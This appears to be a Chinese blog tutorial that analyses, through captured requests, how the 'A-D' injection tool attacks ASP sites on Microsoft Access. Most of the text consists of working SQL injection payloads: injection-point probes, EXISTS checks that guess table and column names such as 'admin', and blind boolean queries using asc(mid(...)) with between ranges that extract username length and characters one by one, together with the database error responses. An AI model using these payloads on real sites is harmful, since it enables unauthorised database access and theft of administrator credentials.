啊D 是一个检测注入漏洞的检测工具,同时也是带领广大入门级的同学的神器;为了能更好的理解注入工具的实现原理,我们今天就来抓包分析分析 啊D注入工具的实现原理。
注入点检测:
1. /?p=9' and char(124)+user+char(124)=0 and ''='
2. ?p=9 and char(124)+user+char(124)=0
3. ?p=9' and char(124)+user+char(124)=0 and '%'='
4. ?p=9 and 1=1
5. ?p=9 and 1=2
6. ?p=9' and 1=1 and ''='
通过判断返回的页面正常或出错来识别是否存在注入。
表段检测:
1 asp?id=729 and exists (select * from [表名])
当存在 admin 表时:
display.asp?id=729 and exits (select * from admin)
Microsoft JET Database Engine 错误 '80040e14'
表达式中 'exits' 函数未定义。
/news/display.asp,行 6
不存在的情况下:
Microsoft JET Database Engine 错误 '80040e37'
Microsoft Jet 数据库引擎找不到输入表或查询 'acdmin'。 确定它是否存在,以及它的名称的拼写是否正确。
/news/display.asp,行 6
EXISTS
指定一个子查询,检测行的存在。
语法:
EXISTS subquery
参数:
subquery
是一个受限的 SELECT 语句 (不允许有 COMPUTE 子句和 INTO 关键字)。有关更多信息,请参见 SELECT 中有关子查询的讨论。
结果类型:
Boolean
结果值:
如果子查询包含行,则返回 TRUE。
表段名检测 啊D 中需要依赖已有的表名,当表名很变态或不常见时 啊D就显得无能为力。同理当字段也相当变态时 注入型工具都显得无能为力。
字段检测:
display.asp?id=729 and exists (select [字段名] from [表名]
当存在某表时,将返回正常页面。否则 返回:
Microsoft JET Database Engine 错误 '80040e10'
至少一个参数没有被指定值。
/news/display.asp,行 6
内容检测:
内容长度:
/news/display.asp?id=729 and (select top 1 asc(mid(cstr(列名),起始位置, 长度)) from (Select Top 1 [username] from [admin] where 1=1 order by [username]) T Order by [username] desc) between -12500 and -10000
display.asp?id=729 and (select top 1 asc(mid(cstr(列名), 起始位置, 长度)) from (Select Top 1 [username] from [admin] where 1=1 order by [username]) T Order by [username] desc) between -18005 and -18005
asc 将取得的字串中的内容转换为ASCII码 mid定位字符串中的字符,起始为止通常用 2 ,3 这样方便检测内容为汉字的子串
between and 很大的负值表示为 汉字ASCII
通过 between XX and XX 两个很大负值按照一定顺序减小 知道返回正确页面为止 获得;
获取内容长度:
/news/display.asp?id=729 and (select top 1 len([username]) from (Select Top 2 [username] from [admin] where 1=1 order by [username]) T Order by [username] desc) between 0 and 99999999
/display.asp?id=729 and (select top 1 len([username]) from (Select Top 2 [username] from [admin] where 1=1 order by [username]) T Order by [username] desc) between 3 and 4
display.asp?id=729 and (select top 1 len([username]) from (Select Top 2 [username] from [admin] where 1=1 order by [username]) T Order by [username] desc) between 3 and 3
整型长度检测:
News_Show.asp?Id=67 and (select top 1 len([id]) from (Select Top 1 [id] from [admin] where 1=1 order by [id]) T Order by [id] desc) between 1 and 1
整型内容检测:
News_Show.asp?Id=67 and (select top 1 asc(mid(cstr(id),1,1)) from (Select Top 1 [id] from [admin] where 1=1 order by [id]) T Order by [id] desc) between 51 and 55
获取内容:
据上诉判断的长度
display.asp?id=729 and (select top 1 asc(mid(cstr(username),1,1)) from (Select Top 2 [username] from [admin] where 1=1 order by [username]) T Order by [username] desc) between 30 and 130
display.asp?id=729 and (select top 1 asc(mid(cstr(username),4,1)) from (Select Top 2 [username] from [admin] where 1=1 order by [username]) T Order by [username] desc) between -12500 and -10000
求出每个字符中的内容
ASC 每个字符串的ASCII码来做判断, 最后求出正确的字符;
啊D的工作原理我们就分析到这里,当然上述的代码都是一些片段,而啊D真正做的还很多(通过多线程匹配长度及内容等)。
留言评论(旧系统):